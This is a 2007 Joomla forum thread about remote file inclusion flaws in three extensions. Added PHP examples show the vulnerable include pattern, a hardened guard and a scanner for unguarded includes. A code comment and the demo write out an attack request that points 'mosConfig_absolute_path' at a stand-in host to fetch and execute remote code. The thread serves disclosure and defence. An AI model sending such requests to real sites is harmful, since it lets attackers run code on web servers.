WARNING: Article for Joomla, Autostand & Joomlapack for Joomla vulnerability

For all Non-Joomla! security issues. ie 3pd Components etc.

armybot
Joomla! Apprentice
Posts: 28
Joined: Fri Jun 09, 2006 7:58 am

WARNING: Article for Joomla, Autostand & Joomlapack for Joomla vulnerability

Post by armybot » Tue Apr 17, 2007 5:18 am

ARTICLE
A vulnerability has been identified in Article (module for Joomla), which could be exploited by remote attackers to execute arbitrary commands. This issue is caused by input validation errors in the "components/com_articles.php" and "classes/html/com_articles.php" scripts when processing the "absolute_path" parameter, which could be exploited by remote attackers to include malicious PHP scripts and execute arbitrary commands with the privileges of the web server.

Affected Products

Article (module for Joomla) version 1.1 and prior

See:
http://www.milw0rm.com/exploits/3736
http://www.frsirt.com/english/advisories/2007/1394


AUTOSTAND
A vulnerability has been identified in AutoStand (module for Joomla), which could be exploited by remote attackers to execute arbitrary commands. This issue is caused by an input validation error in the "mod_as_category.php" script that does not validate the "mosConfig_absolute_path" parameter, which could be exploited by remote attackers to include malicious PHP scripts and execute arbitrary commands with the privileges of the web server.

Affected Products

AutoStand (module for Joomla) version 1.1 and prior


See:
http://www.milw0rm.com/exploits/3734
http://www.frsirt.com/english/advisories/2007/1392


JoomlaPack for Joomla "mosConfig_absolute_path" PHP File Inclusion Vulnerability

A vulnerability has been identified in JoomlaPack (module for Joomla), which could be exploited by remote attackers to execute arbitrary commands. This issue is caused by an input validation error in the "includes/CAltInstaller.php" script when processing the "mosConfig_absolute_path" parameter, which could be exploited by remote attackers to include malicious PHP scripts and execute arbitrary commands with the privileges of the web server.

Affected Products

JoomlaPack (module for Joomla) version 1.0.4a2 RE and prior

NOTE: 1.0.4.a3 is OUT and doesn't seem to have any problem at all (contacting the author about it).

Info:
http://www.frsirt.com/english/advisories/2007/1429


It could be useful to update the 3rd party vulnerability list.

Take care,

ArMyBoT
Last edited by armybot on Wed Apr 18, 2007 9:26 am, edited 1 time in total.
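All three advisories above describe the same Joomla 1.0-era bug: an extension file that can be requested directly (nothing checks that Joomla's index.php loaded it) builds an include path from a variable that PHP's register_globals lets the request set. The following is an added example written for this thread, not code from Article, AutoStand, JoomlaPack or Joomla itself; mod_example.php, helper.php and evil.example are made-up names, and it assumes register_globals=On, which was off by default since PHP 4.2 but still common on 2007 shared hosting. The vulnerable shape only computes the include target rather than including it, so the script is safe to run.

```php
<?php
// Added example (not code from Article, AutoStand, JoomlaPack or Joomla).
// Assumed names: mod_example.php, includes/helper.php, evil.example.
//
// With register_globals=On every request parameter becomes a global variable
// before the script body runs, so
//   GET /modules/mod_example.php?mosConfig_absolute_path=http://evil.example/x
// sets $mosConfig_absolute_path = 'http://evil.example/x'. A module file that
// (a) can be requested directly and (b) builds an include path from that
// variable fetches and executes http://evil.example/x/includes/helper.php
// with the web server's privileges. That is the bug in all three advisories.

// --- Vulnerable shape. Real vulnerable files did
//       require_once($mosConfig_absolute_path . '/includes/...');
//     with no guard; here the path is only computed and returned.
function vulnerable_include_target(array $request_globals)
{
    // Emulates register_globals: request parameters become local variables.
    extract($request_globals, EXTR_OVERWRITE);
    return $mosConfig_absolute_path . '/includes/helper.php';
}

// --- Hardened shape: the guard nunomsh mentions below, plus two safeguards.
// 1. defined('_VALID_MOS') or die(...) at the very top of the file. Joomla
//    1.0's index.php defines _VALID_MOS before loading any module or
//    component, so a direct request to the file is stopped before any
//    include statement runs. In a real module file this is a bare statement,
//    not an exception; the exception here just keeps the demo running.
// 2. The base path is taken from configuration.php (loaded by index.php after
//    request variables are registered, so it overwrites them), never from
//    something the request could have set first.
// 3. Defence in depth: refuse anything that looks like a URL stream or
//    carries a NUL byte, in case allow_url_include is on.
function hardened_include_target(string $config_absolute_path)
{
    if (!defined('_VALID_MOS')) {
        throw new RuntimeException('Direct Access to this location is not allowed.');
    }
    if (preg_match('#^[a-z][a-z0-9+.\-]*://#i', $config_absolute_path) !== 0
        || strpos($config_absolute_path, "\0") !== false) {
        throw new RuntimeException('Refusing non-local base path');
    }
    return rtrim($config_absolute_path, '/') . '/includes/helper.php';
}

// --- Demo with a constructed attacker request ---------------------------------
$attack = ['mosConfig_absolute_path' => 'http://evil.example/x'];
echo "vulnerable: ", vulnerable_include_target($attack), "\n";

try {
    // Direct request: index.php never ran, so _VALID_MOS is undefined.
    hardened_include_target('/var/www/joomla');
} catch (RuntimeException $e) {
    echo "hardened, direct request: ", $e->getMessage(), "\n";
}

define('_VALID_MOS', 1);   // what index.php does before loading modules
echo "hardened, via index.php: ", hardened_include_target('/var/www/joomla'), "\n";

try {
    // Even with the guard satisfied, a URL base path is refused.
    hardened_include_target('http://evil.example/x');
} catch (RuntimeException $e) {
    echo "hardened, URL base path: ", $e->getMessage(), "\n";
}
```

The guard alone is what closed these advisories, because the file can then only run inside a request that index.php has already set up; the two extra checks matter only if some other code path ever lets request data reach the base path again.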

nunomsh
Joomla! Apprentice
Posts: 12
Joined: Sat Feb 17, 2007 6:26 pm

Re: WARNING: Article for Joomla, Autostand & Joomlapack for Joomla vulnerability

Post by nunomsh » Wed May 02, 2007 10:35 pm

Security updated! Thanks for the info. Version 2.0 fixes the missing defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );

thinkart
Joomla! Apprentice
Posts: 18
Joined: Fri Jan 12, 2007 11:01 am

Re: WARNING: Article for Joomla, Autostand & Joomlapack for Joomla vulnerability

Post by thinkart » Fri May 04, 2007 10:47 pm

nunomsh wrote: Security updated! Thanks for the info. Version 2.0 fixes the missing defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );
So where can the version 2 be downloaded? JoomlaPack seems to have disappeared from the "extensions".
And what should I do when I was using 1.0.3 and backed-up some sites? Can I expect that one day all my sites on a server are gone? Anything out there to prevent this? Any help appreciated!
Last edited by thinkart on Fri May 04, 2007 10:50 pm, edited 1 time in total.

nunomsh
Joomla! Apprentice
Posts: 12
Joined: Sat Feb 17, 2007 6:26 pm

Re: WARNING: Article for Joomla, Autostand & Joomlapack for Joomla vulnerability

Post by nunomsh » Sat May 05, 2007 2:03 am

I can only speak for AutoStand; the module you can download at http://www.webstylecreations.com, or insert the parameter in the file, but since some changes were made it is better to replace the file.
About the security, upload this file to root and run it. This will do a check-up of all the files to see if the code has the parameter.
thinkart wrote: Can I expect that one day all my sites on a server are gone? Anything out there to prevent this?


Nobody can give you 100% certainty that it will never happen, but it's in our best interest to make the extensions better and more secure, but sometimes we miss something...
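The checker nunomsh attached is not reproduced on the page. As a stand-in, here is an added example written for this thread (not nunomsh's script and not part of any extension) of what such a check looks like: it walks a Joomla 1.0 tree and reports PHP files that include or require something under $mosConfig_absolute_path or $absolute_path before any defined('_VALID_MOS') guard, or in a file that has no guard at all. It is a text-based heuristic that lists candidates for manual review rather than proving a file safe; the sample tree it scans is constructed inline in a temporary directory, and mod_bad.php, com_bad2, mod_good.php and mod_unrelated.php are made-up names.

```php
<?php
// Added example, not the checker attached to the post above and not code
// from any Joomla extension. Heuristic source scan for the pattern behind
// the Article / AutoStand / JoomlaPack advisories.

function guard_offset(string $src): int
{
    // Byte offset of the defined('_VALID_MOS') check (any quoting/spacing),
    // or -1 if the file has no such guard.
    if (preg_match('/defined\s*\(\s*[\'"]_VALID_MOS[\'"]\s*\)/', $src, $m, PREG_OFFSET_CAPTURE) !== 1) {
        return -1;
    }
    return $m[0][1];
}

function unguarded_request_includes(string $src): array
{
    // Line numbers of include/require statements whose path starts with a
    // variable that register_globals lets the request set, and which appear
    // before the _VALID_MOS guard (or in a file with none).
    $guard = guard_offset($src);
    $hits  = [];
    $re = '/\b(?:include|require)(?:_once)?\s*\(?\s*\$(?:mosConfig_absolute_path|absolute_path)\b/';
    if (preg_match_all($re, $src, $m, PREG_OFFSET_CAPTURE)) {
        foreach ($m[0] as $match) {
            list($text, $offset) = $match;
            if ($guard < 0 || $offset < $guard) {
                $hits[] = substr_count(substr($src, 0, $offset), "\n") + 1;
            }
        }
    }
    return $hits;
}

function scan_tree(string $root): array
{
    // Map of relative path => offending line numbers, for every .php file
    // under $root that has at least one unguarded request-controlled include.
    $findings = [];
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($it as $file) {
        if (strtolower($file->getExtension()) !== 'php') {
            continue;
        }
        $lines = unguarded_request_includes(file_get_contents($file->getPathname()));
        if ($lines) {
            $findings[substr($file->getPathname(), strlen($root) + 1)] = $lines;
        }
    }
    ksort($findings);
    return $findings;
}

// --- Constructed sample tree (made-up files, not real extension code) --------
$root = sys_get_temp_dir() . '/valid_mos_demo_' . getmypid();
$samples = [
    // No guard, request-controlled include: should be reported.
    'modules/mod_bad.php' =>
        "<?php\nrequire_once(\$mosConfig_absolute_path . '/includes/x.php');\n",
    // Same bug via the other parameter name from the Article advisory.
    'components/com_bad2/helper.php' =>
        "<?php\ninclude \$absolute_path . '/lib.php';\n",
    // Guard precedes the include: not reported.
    'modules/mod_good.php' =>
        "<?php\ndefined('_VALID_MOS') or die('Direct Access to this location is not allowed.');\n"
        . "require_once(\$mosConfig_absolute_path . '/includes/x.php');\n",
    // Path not derived from a request-settable variable: not reported.
    'modules/mod_unrelated.php' =>
        "<?php\nrequire_once(dirname(__FILE__) . '/x.php');\n",
];
foreach ($samples as $rel => $src) {
    $path = "$root/$rel";
    @mkdir(dirname($path), 0700, true);
    file_put_contents($path, $src);
}

foreach (scan_tree($root) as $rel => $lines) {
    echo "$rel: unguarded request-controlled include on line(s) ", implode(', ', $lines), "\n";
}

// Remove the constructed tree again (children first, then the root).
$cleanup = new RecursiveIteratorIterator(
    new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS),
    RecursiveIteratorIterator::CHILD_FIRST
);
foreach ($cleanup as $f) {
    $f->isDir() ? rmdir($f->getPathname()) : unlink($f->getPathname());
}
rmdir($root);
```

To use it on a real site, replace the constructed-tree section with `scan_tree('/path/to/joomla')`. Because it only pattern-matches source text, it misses includes built through an intermediate variable and cannot see guards that live in a separately included file, so treat an empty report as "nothing obvious", not as a clean bill of health.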

rlehman
Joomla! Fledgling
Posts: 2
Joined: Fri Dec 01, 2006 1:28 am

Re: WARNING: Article for Joomla, Autostand & Joomlapack for Joomla vulnerability

Post by rlehman » Sat May 12, 2007 8:01 pm

I have read that there is supposed to be a newer release of JoomlaPack that corrects the security vulnerability. Can anyone tell all of us where to go to download the newest release? I have looked on Joomla.org, Google, etc. but cannot find anywhere. It is as if the developer of this component has fallen off the face of the earth?

schipperijn
Joomla! Enthusiast
Posts: 110
Joined: Thu Apr 06, 2006 3:42 pm
Location: Leeuwarden

Re: WARNING: Article for Joomla, Autostand & Joomlapack for Joomla vulnerability

Post by schipperijn » Sat May 12, 2007 9:22 pm

Yes, that would be great. The only good backup system I loved was this JoomlaPack.
The AJAX in it makes it possible for large sites not to hit a timeout at database/scripts.
It's simple and fast for small sites. Making a mistake is almost not possible. Download is simple.

I will mail [email protected] and see what has happened and what the planning is.

tortureduck
Joomla! Apprentice
Posts: 22
Joined: Sat Sep 17, 2005 9:14 am

Re: WARNING: Article for Joomla, Autostand & Joomlapack for Joomla vulnerability

Post by tortureduck » Sat May 19, 2007 7:27 am

The homepage is: http://sledge81.freehostia.com/

He addresses the security bug in this article: http://sledge81.freehostia.com/index.ph ... 0&Itemid=1
